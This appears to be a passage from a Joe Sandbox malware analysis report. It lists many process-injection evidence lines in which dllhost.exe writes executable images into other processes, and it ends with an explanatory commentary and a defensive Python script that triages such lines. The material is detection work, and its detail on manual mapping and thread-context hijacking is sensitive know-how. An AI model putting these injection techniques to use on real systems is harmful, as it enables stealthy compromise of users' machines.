Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 20C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 14F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1BFF06F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 24089940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28B955D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 14ECB470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 191C8F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 27F4ECC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 17B55CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 2580 base: 3400000 value: 4D
Source: C:\Users\user\Desktop\0Ty.png.exe | Thread register set: target process: 8008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 8008
Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Thread register set: target process: 7936
Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Thread register set: target process: 8136
Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | Thread register set: target process: 8052
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3228
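Read together, the entries above describe two stages. powershell.exe writes into dllhost.exe at 140000000 and the pages just above it (the linker's default ImageBase for 64-bit executables, so an image is being copied in header first, then sections), and the hijacked dllhost.exe then writes buffers that begin with 4D5A ("MZ") into almost every other process on the machine, including explorer.exe, smartscreen.exe, the WMI hosts and the dropped eHKpRkSMxsuuj.exe, which is consistent with the user-mode hooking signatures listed at the top of the report. The "Thread register set" entries are the matching thread-context rewrites that transfer execution into the written memory. The Python below is an added example and not part of the Joe Sandbox report: it parses evidence lines in this report's flattened format (missing space before "Memory written" and trailing "Jump to behavior" link text included) and reduces them to per-source findings. The sample lines are constructed from entries in this section; the sensitive-process list, the 1 MiB window and the default-ImageBase heuristic are this example's assumptions.

```python
"""Triage of Joe Sandbox 'Memory written' / 'Thread register set' evidence lines.

Added example, not part of the report. SAMPLE is constructed from entries in the
section above; SENSITIVE, the 1 MiB window and the ImageBase heuristic are assumptions.
"""
import re
from collections import defaultdict

# The flattened report fuses the two table cells ("...dllhost.exeMemory written: ..."),
# so \s* and an optional " | " between the fields accept fused, spaced and piped text.
MEM_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?:\|\s*)?Memory written:\s*(?P<dst>.+?)\s+base:\s*"
    r"(?P<base>[0-9A-Fa-f]+)(?:\s+value(?: starts with)?:\s*(?P<value>[0-9A-Fa-f]+))?$"
)
THREAD_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?:\|\s*)?Thread register set:\s*target process:\s*(?P<pid>\d+)$"
)
# Assumption: processes where a foreign write is almost never benign.
SENSITIVE = {"lsass.exe", "winlogon.exe", "explorer.exe", "dwm.exe", "smartscreen.exe"}
PE_DEFAULT_BASE_X64 = 0x140000000  # linker default ImageBase for 64-bit executables


def _proc(path):
    """'C:\\Windows\\System32\\dllhost.exe' -> 'dllhost.exe' (lower-cased)."""
    return path.rsplit("\\", 1)[-1].strip().lower()


def parse_events(lines):
    """One dict per recognised evidence line; anything else is skipped."""
    events = []
    for raw in lines:
        line = raw.strip().removesuffix("Jump to behavior").strip()  # drop the report's link text
        if m := MEM_RE.match(line):
            events.append({"kind": "write", "src": _proc(m["src"]), "dst": _proc(m["dst"]),
                           "base": int(m["base"], 16),
                           "mz": (m["value"] or "").upper().startswith("4D5A")})
        elif m := THREAD_RE.match(line):
            events.append({"kind": "thread_ctx", "src": _proc(m["src"]), "pid": int(m["pid"])})
    return events


def looks_like_manual_map(bases):
    """Heuristic: a write at the default x64 ImageBase plus at least two more writes within
    1 MiB above it is what a PE copied in header-then-sections looks like."""
    if PE_DEFAULT_BASE_X64 not in bases:
        return False
    return sum(1 for b in bases if 0 < b - PE_DEFAULT_BASE_X64 < 1 << 20) >= 2


def summarize(events):
    """Per source process: targets that received an MZ-headed buffer, sensitive targets written,
    PIDs whose thread context was rewritten, and targets that look like a manually mapped image."""
    by_src = defaultdict(lambda: {"mz_targets": set(), "sensitive_hits": set(),
                                  "thread_ctx_pids": set(), "manual_map_targets": set()})
    bases = defaultdict(set)  # (src, dst) -> write addresses
    for ev in events:
        s = by_src[ev["src"]]
        if ev["kind"] == "write":
            bases[(ev["src"], ev["dst"])].add(ev["base"])
            if ev["mz"]:
                s["mz_targets"].add(ev["dst"])
            if ev["dst"] in SENSITIVE:
                s["sensitive_hits"].add(ev["dst"])
        else:
            s["thread_ctx_pids"].add(ev["pid"])
    for (src, dst), addrs in bases.items():
        if looks_like_manual_map(addrs):
            by_src[src]["manual_map_targets"].add(dst)
    return dict(by_src)


def verdict(summary):
    """Human-readable findings, one per (source, behaviour) pair."""
    findings = []
    for src, s in sorted(summary.items()):
        if s["mz_targets"]:
            findings.append(f"{src}: MZ-headed buffer written into {len(s['mz_targets'])} distinct processes")
        if s["sensitive_hits"]:
            findings.append(f"{src}: wrote into sensitive processes {sorted(s['sensitive_hits'])}")
        if s["manual_map_targets"]:
            findings.append(f"{src}: image mapped piecewise at 0x140000000 into {sorted(s['manual_map_targets'])}")
        if s["thread_ctx_pids"]:
            findings.append(f"{src}: thread context rewritten in PIDs {sorted(s['thread_ctx_pids'])}")
    return findings


# Constructed sample in the report's own flattened format (fused cells, link text, one piped line).
SAMPLE = r"""
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 3400000 value: 4D
Source: C:\Users\user\Desktop\0Ty.png.exeThread register set: target process: 8008Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
""".strip().splitlines()

if __name__ == "__main__":
    for finding in verdict(summarize(parse_events(SAMPLE))):
        print(finding)
```

Feeding the full evidence list into parse_events instead of SAMPLE turns the several hundred lines above into a handful of findings per source; the "PID: 2580" form is kept as a target named "pid: 2580" because the report gives no image path for it, and the partial value "4D" is deliberately not counted as an MZ header.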
